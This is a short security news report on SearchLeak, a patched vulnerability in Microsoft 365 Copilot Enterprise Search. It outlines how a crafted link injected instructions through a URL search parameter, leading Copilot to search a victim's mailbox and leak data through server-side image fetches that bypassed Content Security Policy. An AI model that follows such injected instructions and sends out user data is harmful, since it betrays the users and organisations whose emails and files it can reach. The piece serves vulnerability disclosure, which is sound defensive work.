Microsoft Fixes Critical Copilot SearchLeak Vulnerability That Could Expose Emails and Files

Microsoft has fixed a critical vulnerability in Microsoft 365 Copilot Enterprise Search that could have allowed attackers to steal sensitive corporate data with a single click.

The flaw, dubbed SearchLeak (CVE-2026-42824), was discovered by Varonis. Microsoft has already deployed a backend fix, and customers do not need to take any action.

Researchers said the issue could have exposed emails, passwords, access codes, meeting details, calendar entries, SharePoint documents, and OneDrive files.

How SearchLeak Worked

Varonis found that attackers could abuse a search parameter in Copilot Enterprise Search URLs to inject instructions into the AI system. A victim only needed to click a specially crafted Microsoft link.

The attack could instruct Copilot to search a user’s mailbox, extract data, and send it through an external image request without further user interaction.

Three Vulnerabilities Chained Together

SearchLeak combined:

• Parameter-to-prompt injection via the Copilot search query parameter
• An HTML rendering race condition
• A Bing Search by Image SSRF technique that bypassed Content Security Policy protections

Together, these flaws enabled silent data exfiltration from Microsoft 365 environments.

The final stage used Bing’s image analysis infrastructure to fetch image URLs server-side, allowing sensitive data to reach attacker-controlled logs.

The incident highlights how attackers can combine traditional web vulnerabilities with AI-specific weaknesses to target enterprise AI systems.

Microsoft recently patched about 200 vulnerabilities in its latest Patch Tuesday updates. Researchers also disclosed the RougePlanet privilege-escalation exploit, which can grant SYSTEM-level access on affected devices.

Separately, GitHub’s npm team introduced security-focused changes in npm v12 to help reduce software supply chain attacks.

Via BleepingComputer